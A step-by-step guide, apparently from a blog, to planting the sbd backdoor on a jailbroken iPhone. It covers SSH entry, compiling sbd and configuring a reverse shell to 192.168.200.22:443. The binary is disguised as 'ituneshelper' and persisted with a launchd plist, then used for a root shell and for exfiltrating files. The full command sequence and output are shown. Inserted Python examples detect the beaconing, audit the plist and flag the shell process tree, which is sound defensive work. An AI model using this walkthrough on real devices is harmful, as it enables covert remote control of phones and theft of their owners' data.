To keep a backdoor you first have to get onto the device. After the jailbreak, the OpenSSH root account carries the default password alpine; change it. You can connect over ssh, by brute-force cracking or by a physical connection, as long as you achieve your goal.
We can use the sbd-1.36 backdoor by michelblomgren (only TCP/IP communication is supported).
1. Install iphone-gcc & make:
iphone4:~ root# uname -a
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin
iphone4:~ root# apt-get update
Get:1 http://repo.biteyourapple.net ./ Release.gpg [490B]
Hit http://cydia.zodttd.com stable Release.gpg
Hit http://apt.saurik.com ios/675.00 Release.gpg
Hit http://repo.insanelyi.com ./ Release.gpg
...
iphone4:~ root# apt-get install iphone-gcc
Reading package lists... Done
Building dependency tree
Reading state information... Done
...
Setting up ldid (610-5) ...
Setting up com.sull.iphone-gccheaders (1.0-11) ...
Setting up com.sull.fake-libgcc (1.0-2) ...
Setting up iphone-gcc (4.2-20080604-1-8) ...
iphone4:~/sbd-1.36 root# apt-get install make
Reading package lists... Done
Building dependency tree
Reading state information... Done
...
Unpacking make (from .../make_3.81-2_iphoneos-arm.deb) ...
Setting up make (3.81-2) ...
2. Download the backdoor:
iphone4:~ root# wget http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
--23:50:43--  http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
Resolving packetstorm.tacticalflex.com... 173.160.180.156
Connecting to packetstorm.tacticalflex.com|173.160.180.156|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84093 (82K) [application/x-gzip]
Saving to: `sbd-1.36.tar.gz'
100%[==============================================>] 84,093      66.3K/s   in 1.2s
23:50:45 (66.3 KB/s) - `sbd-1.36.tar.gz' saved [84093/84093]
iphone4:~ root# tar -zxvf sbd-1.36.tar.gz
sbd-1.36/
sbd-1.36/sbd.c
sbd-1.36/doexec.c
sbd-1.36/pel.c
sbd-1.36/aes.c
sbd-1.36/sha1.c
sbd-1.36/socket_code.h
sbd-1.36/pel.h
sbd-1.36/aes.h
sbd-1.36/sha1.h
sbd-1.36/sbd.h
sbd-1.36/doexec_unix.h
sbd-1.36/doexec_win32.h
sbd-1.36/readwrite.h
sbd-1.36/misc.h
sbd-1.36/Makefile
sbd-1.36/mktarball.sh
sbd-1.36/README
sbd-1.36/COPYING
sbd-1.36/CHANGES
sbd-1.36/binaries/
sbd-1.36/binaries/sbd.exe
sbd-1.36/binaries/sbdbg.exe
iphone4:~ root# cd sbd-1.36
iphone4:~/sbd-1.36 root# ls -al
total 224
drwx------  3 1000  100    748 Sep 17  2004 ./
drwxr-x---  6 root  wheel  272 Apr 23 ../
-rw-------  1 1000  100   1876 Sep 17  2004 CHANGES
-rw-------  1 1000  100  18007 Jun  8  2004 COPYING
-rw-------  1 1000  100   2176 Jun 20  2004 Makefile
-rw-------  1 1000  100   4880 Sep 11  2004 README
-rw-------  1 1000  100  31370 Jun 12  2004 aes.c
-rw-------  1 1000  100    549 Jun 11  2004 aes.h
drwx------  2 1000  100    136 Sep 11  2004 binaries/
-rw-------  1 1000  100     77 Jun  2  2004 doexec.c
-rw-------  1 1000  100   7114 Sep 11  2004 doexec_unix.h
-rw-------  1 1000  100  19060 Sep  8  2004 doexec_win32.h
-rw-------  1 1000  100  14968 Sep  9  2004 misc.h
-rwx------  1 1000  100    624 Jun 13  2004 mktarball.sh*
-rw-------  1 1000  100  13381 Sep  8  2004 pel.c
-rw-------  1 1000  100    898 Sep  9  2004 pel.h
-rw-------  1 1000  100   9829 Sep  9  2004 readwrite.h
-rw-------  1 1000  100  20557 Sep  9  2004 sbd.c
-rw-------  1 1000  100   2014 Jun  8  2004 sbd.h
-rw-------  1 1000  100   8900 Jun  2  2004 sha1.c
-rw-------  1 1000  100    436 Jun  2  2004 sha1.h
-rw-------  1 1000  100  20800 Sep  9  2004 socket_code.h
3. sbd configuration (IP address, port, password/encryption settings, reconnect interval, etc.)
iphone4:~/sbd-1.36 root# cat sbd.h
#define SOURCE_PORT 0
#define CONVERT_TO_CRLF 0
#define ENCRYPTION 1
#define SHARED_SECRET "password"
#define QUIET 0
#define VERBOSE 0
#define DAEMONIZE 0
#define HIGHLIGHT_INCOMING 0
#define HIGHLIGHT_PREFIX "\x1b[0;32m"
#define HIGHLIGHT_SUFFIX "\x1b[0m"
#define SEPARATOR_BETWEEN_PREFIX_AND_DATA ":"
#define RUN_ONLY_ONE_INSTANCE 0
#define INSTANCE_SEMAPHORE "shadowinteger_bd_semaphore"
/* Connect to 192.168.200.22 on port 443 (https) and serve /bin/bash.
 * Reconnect every 10 seconds.
 */
#define DOLISTEN 0
#define HOST "192.168.200.22"
#define PORT 443
#define RESPAWN_ENABLED 1
#define RESPAWN_INTERVAL 10
#define EXECPROG "/bin/bash"
Alternatively, the same settings can be passed as command-line parameters:
Host: ./sbd -l -p 443 -k 1234
Server: ./sbd -r 10 -q -e /bin/sh -c on -k 1234 -D on 192.168.200.22 443
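The connect-back settings above (HOST, PORT, RESPAWN_INTERVAL) also describe what a defender sees on the wire: a fresh TCP connection to the same host and port every ten seconds. The following is an added example, not part of the original page or of sbd itself, that pulls those defines out of an sbd.h excerpt and then finds such periodic flows in a constructed, iptables-style connection log; the phone's address 192.168.200.40 and the log format are assumptions.

```python
import re
import statistics
from datetime import datetime
from typing import Dict, List, Tuple

DEFINE_RE = re.compile(r'^#define\s+(\w+)\s+("?)([^"\n]*)\2', re.M)
# iptables-style LOG line (constructed format): "<timestamp> ... SRC= DST= DPT="
LINE_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) .*SRC=(\S+) DST=(\S+) DPT=(\d+)")

# Constructed excerpt carrying the connect-back defines from the sbd.h above.
SBD_H = '#define HOST "192.168.200.22"\n#define PORT 443\n#define RESPAWN_INTERVAL 10\n'

# Constructed gateway log: the phone (192.168.200.40, assumed) reconnects to
# HOST:PORT every RESPAWN_INTERVAL seconds; 203.0.113.9 is unrelated noise.
SAMPLE_LOG = """\
Apr 24 23:51:00 gw kernel: NEW SRC=192.168.200.40 DST=192.168.200.22 DPT=443
Apr 24 23:51:03 gw kernel: NEW SRC=192.168.200.40 DST=203.0.113.9 DPT=443
Apr 24 23:51:10 gw kernel: NEW SRC=192.168.200.40 DST=192.168.200.22 DPT=443
Apr 24 23:51:20 gw kernel: NEW SRC=192.168.200.40 DST=192.168.200.22 DPT=443
Apr 24 23:51:27 gw kernel: NEW SRC=192.168.200.40 DST=203.0.113.9 DPT=443
Apr 24 23:51:30 gw kernel: NEW SRC=192.168.200.40 DST=192.168.200.22 DPT=443
Apr 24 23:51:41 gw kernel: NEW SRC=192.168.200.40 DST=192.168.200.22 DPT=443
Apr 24 23:52:39 gw kernel: NEW SRC=192.168.200.40 DST=203.0.113.9 DPT=443
"""


def parse_sbd_config(text: str) -> Dict[str, str]:
    """Collect the #define values from an sbd.h so the expected beacon is known."""
    return {name: value for name, _q, value in DEFINE_RE.findall(text)}


def find_beacons(lines: List[str], min_hits: int = 4,
                 max_jitter: float = 1.5) -> Dict[Tuple[str, str, int], float]:
    """Return {(src, dst, dport): median gap in seconds} for flows that reconnect
    at a near-constant interval; irregular or rare flows are dropped."""
    seen: Dict[Tuple[str, str, int], List[datetime]] = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        stamp = datetime.strptime(m.group(1), "%b %d %H:%M:%S")
        seen.setdefault((m.group(2), m.group(3), int(m.group(4))), []).append(stamp)
    beacons = {}
    for flow, stamps in seen.items():
        if len(stamps) < min_hits:
            continue  # too few connections to call it periodic
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if statistics.pstdev(gaps) <= max_jitter:  # regular enough to be a timer
            beacons[flow] = statistics.median(gaps)
    return beacons
```

A hit whose median gap is close to RESPAWN_INTERVAL and whose destination equals HOST:PORT is the phone's sbd loop; the TLS port alone hides nothing, because the periodicity is what gives it away.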
4. Compile
iphone4:~/sbd-1.36 root# make
Usage:
  make unix     - Linux, NetBSD, FreeBSD, OpenBSD
  make sunos    - SunOS (Solaris)
  make win32    - native win32 console app (w/ Cygwin + MinGW)
  make win32bg  - create a native win32 no-console app (w/ Cygwin + MinGW)
  make win32bg CFLAGS=-DSTEALTH - stealthy no-console app
  make mingw    - native win32 console app (w/ MinGW MSYS)
  make mingwbg  - native win32 no-console app (w/ MinGW MSYS)
  make cygwin   - Cygwin console app
  make darwin   - Darwin
iphone4:~/sbd-1.36 root# make darwin
rm -f sbd sbd.exe *.o core
gcc -Wall -Wshadow -O2 -o sbd pel.c aes.c sha1.c doexec.c sbd.c
strip sbd
iphone4:~/sbd-1.36 root# ls -al sbd
-rwxr-xr-x 1 root 100 55296 Apr 24 sbd*
5. Run the backdoor
iphone4:~/sbd-1.36 root# cp sbd /usr/bin/ituneshelper
iphone4:~/sbd-1.36 root# cd /Library/LaunchDaemons/
iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x   2 root wheel 136 Apr 24 ./
drwxrwxr-x  18 root admin 816 Dec 31 ../
-rw-r--r--   1 root wheel 847 Feb 15  2011 com.openssh.sshd.plist
iphone4:/Library/LaunchDaemons root# cat << EOF > com.ituneshelper.start.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.ituneshelper.start</string>
    <key>ProgramArguments</key>
    <array>
        <string>/usr/bin/ituneshelper</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>StartInterval</key>
    <integer>1</integer>
</dict>
</plist>
EOF
iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x   2 root wheel 136 Apr 24 ./
drwxrwxr-x  18 root admin 816 Dec 31 ../
-rw-r--r--   1 root wheel 404 Apr 24 com.ituneshelper.start.plist
-rw-r--r--   1 root wheel 847 Feb 15  2011 com.openssh.sshd.plist
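The plist above is exactly what a periodic audit of /Library/LaunchDaemons should catch: a label nobody vetted that re-runs a binary every second. This added example (not from the page or from sbd) parses launchd plists with plistlib and flags those two traits; the two sample plists are constructed from the listing above, and the allow-list KNOWN_LABELS and the 60-second threshold are assumptions.

```python
import os
import plistlib
from typing import Dict, List

# Constructed sample in the shape of the plist written in step 5 (keys and values
# from the page; the XML framing around them is assumed).
SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.ituneshelper.start</string>
  <key>ProgramArguments</key><array><string>/usr/bin/ituneshelper</string></array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>1</integer>
</dict></plist>"""

# Constructed benign sample modelled on the stock com.openssh.sshd entry.
SSHD_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.openssh.sshd</string>
  <key>Program</key><string>/usr/sbin/sshd</string>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

KNOWN_LABELS = {"com.openssh.sshd"}  # hypothetical allow-list vetted for this device
MAX_BENIGN_INTERVAL = 60             # seconds; anything shorter looks like a re-spawn loop


def audit_launchd_plist(data: bytes) -> List[str]:
    """Return reasons a LaunchDaemon plist deserves a closer look (empty = clean)."""
    try:
        d = plistlib.loads(data)
    except Exception as exc:  # neither XML nor binary plist: still worth a look
        return [f"unparseable plist: {type(exc).__name__}"]
    findings = []
    label = d.get("Label", "")
    args = d.get("ProgramArguments") or [d.get("Program", "")]
    program = args[0] if args else ""
    if label not in KNOWN_LABELS:
        findings.append(f"unvetted label {label!r} runs {program}")
    interval = d.get("StartInterval")
    if isinstance(interval, int) and interval <= MAX_BENIGN_INTERVAL:
        # launchd restarts the program every `interval` seconds, so a killed
        # process comes straight back; step 5 sets this to 1.
        findings.append(f"StartInterval {interval}s re-spawns {program}")
    return findings


def audit_directory(path: str = "/Library/LaunchDaemons") -> Dict[str, List[str]]:
    """Audit every .plist in a LaunchDaemons directory (on the device or a copy)."""
    report = {}
    for name in sorted(os.listdir(path)):
        if name.endswith(".plist"):
            with open(os.path.join(path, name), "rb") as fh:
                report[name] = audit_launchd_plist(fh.read())
    return report
```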
6. Connect-back target
root@coresec:~# uname -a
Linux coresec 3.0.0-17-generic #30-Ubuntu SMP Thu Mar 8 20:45:39 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
root@coresec:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:03:72:5e
          inet addr:192.168.200.22  Bcast:192.168.200.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe03:725e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:14741 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10042 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:20159805 (20.1 MB)  TX bytes:720669 (720.6 KB)
root@coresec:/home/enzo/sbd-1.36# ./sbd -l -p 443 -k password
id
uid=0(root) gid=0(wheel) groups=0(wheel)
/bin/bash -i
bash: no job control in this shell
bash-4.0# ps -ef
UID PID PPID C STIME TTY TIME CMD
0 1 0 0 0 0.00 ?? 0:00.95 /sbin/launchd
0 19 1 0 0 0.00 ?? 0:00.95 /usr/libexec/UserEventAgent -l System
0 21 1 0 0 0.00 ?? 0:00.68 /usr/sbin/notifyd
0 23 1 0 0 0.00 ?? 0:00.41 /usr/sbin/syslogd
0 25 1 0 0 0.00 ?? 0:01.64 /usr/libexec/configd
25 27 1 0.00 ?? 0:01.53 /System/Library/Frameworks/CoreTelephony.framework/Support/CommCenterClassic
501 29 1 0.00 ?? 0:12.27 /System/Library/CoreServices/SpringBoard.app/SpringBoard
501 33 1 0 0 0.00 ?? 0:00.60 /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled
0 37 1 0 0 0.00 ?? 0:00.81 /usr/libexec/lockdownd
0 43 1 0 0 0.00 ?? 0:00.56 /System/Library/CoreServices/powerd.bundle/powerd
0 49 1 0 0 0.00 ?? 0:19.04 /usr/libexec/locationd
0 55 1 0 0 0.00 ?? 0:00.21 /usr/bin/sbsettingsd
0 56 1 0 0 0.00 ?? 0:00.69 /usr/sbin/wifid
501 58 1 0.00 ?? 0:00.46 /System/Library/PrivateFrameworks/Ubiquity.framework/Versions/A/Support/ubd
501 71 1 0.00 ?? 0:01.99 /usr/sbin/mediaserverd
501 72 1 0.00 ?? 0:00.13 /System/Library/PrivateFrameworks/MediaRemote.framework/Support/mediaremoted
65 73 1 0.00 ?? 0:00.27 /usr/sbin/mDNSResponder -launchd
501 75 1 0.00 ?? 0:00.87 /System/Library/PrivateFrameworks/IMCore.framework/imagent.app/imagent
501 76 1 0.00 ?? 0:00.45 /System/Library/PrivateFrameworks/IAP.framework/Support/iapd
0 78 1 0 0 0.00 ?? 0:00.13 /usr/libexec/fseventsd
501 79 1 0.00 ?? 0:00.92 /usr/sbin/fairplayd.N90
501 80 1 0.00 ?? 0:01.76 /System/Library/PrivateFrameworks/DataAccess.framework/Support/dataaccessd
501 86 1 0.00 ?? 0:00.45 /System/Library/PrivateFrameworks/ApplePushService.framework/apsd
501 87 1 0.00 ?? 0:00.34 /System/Library/PrivateFrameworks/AggregateDictionary.framework/Support/aggregated
501 92 1 0.00 ?? 0:00.39 /usr/sbin/BTServer
501 93 1 0.00 ?? 0:00.99 /usr/sbin/aosnotifyd
0 94 1 0 0 0.00 ?? 0:00.02 /usr/bin/ituneshelper
0 157 1 0 0 0.00 ?? 0:00.11 /usr/libexec/networkd
501 260 1 0.00 ?? 0:01.94 /Applications/MobileMail.app/MobileMail
501 261 1 0.00 ?? 0:00.75 /Applications/MobilePhone.app/MobilePhone
0 286 94 0.00 ?? 0:00.03 bash
0 300 286 0.00 ?? 0:00.03 /bin/bash -i
0 303 300 0.00 ?? 0:00.01 ps -ef
bash-4.0# uname -a
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin
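The ps -ef output shows the tell-tale shape of a reverse shell: /usr/bin/ituneshelper (PID 94, started directly by launchd) owns a bash child, which owns an interactive bash child. The following added example (not from the page or from sbd) walks a constructed ps listing with the same PIDs and reports every shell whose launchd-level ancestor is not on an allow-list; TRUSTED_DAEMONS is an assumption.

```python
from typing import Dict, List, Tuple

# Constructed ps output reduced to the columns the check needs (UID PID PPID CMD);
# PIDs and commands follow the step 6 listing above, the other rows are omitted.
SAMPLE_PS = """\
UID PID PPID CMD
0 1 0 /sbin/launchd
0 37 1 /usr/libexec/lockdownd
0 94 1 /usr/bin/ituneshelper
0 157 1 /usr/libexec/networkd
0 286 94 bash
0 300 286 /bin/bash -i
0 303 300 ps -ef
"""

SHELLS = {"bash", "sh", "zsh", "dash"}
# Hypothetical allow-list of launchd children that legitimately hand out shells.
TRUSTED_DAEMONS = {"/usr/sbin/sshd"}


def parse_ps(text: str) -> Dict[int, Tuple[int, str]]:
    """Map pid -> (ppid, command line) from UID/PID/PPID/CMD rows."""
    procs = {}
    for line in text.splitlines()[1:]:
        _uid, pid, ppid, cmd = line.split(None, 3)
        procs[int(pid)] = (int(ppid), cmd)
    return procs


def shells_from_untrusted_daemons(text: str) -> List[List[str]]:
    """For every shell, climb to the launchd child that ultimately spawned it and
    report the chain unless that child is on the allow-list."""
    procs = parse_ps(text)
    reports = []
    for pid, (ppid, cmd) in procs.items():
        exe = cmd.split()[0].rsplit("/", 1)[-1].lstrip("-")  # "-bash" is a login shell
        if exe not in SHELLS:
            continue
        chain, cur = [cmd], ppid
        while cur in procs and cur != 1 and procs[cur][0] != 1:
            chain.append(procs[cur][1])
            cur = procs[cur][0]
        root_cmd = procs[cur][1] if cur in procs else "?"
        chain.append(root_cmd)  # the launchd child at the top of the chain
        if root_cmd.split()[0] not in TRUSTED_DAEMONS:
            reports.append(chain)
    return reports
```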
7. File transfer
root@coresec:/home/enzo/sbd-1.36# sbd -l -p 12345 -k secret > output.file
iphone4:~/sbd-1.36 root# cat /.../.../input.file | ./sbd -k secret 192.168.200.22 12345
8. Uninstall the backdoor
iphone4:/Library/LaunchDaemons root# rm -rf com.ituneshelper.start.plist
iphone4:/Library/LaunchDaemons root# rm -rf /usr/bin/ituneshelper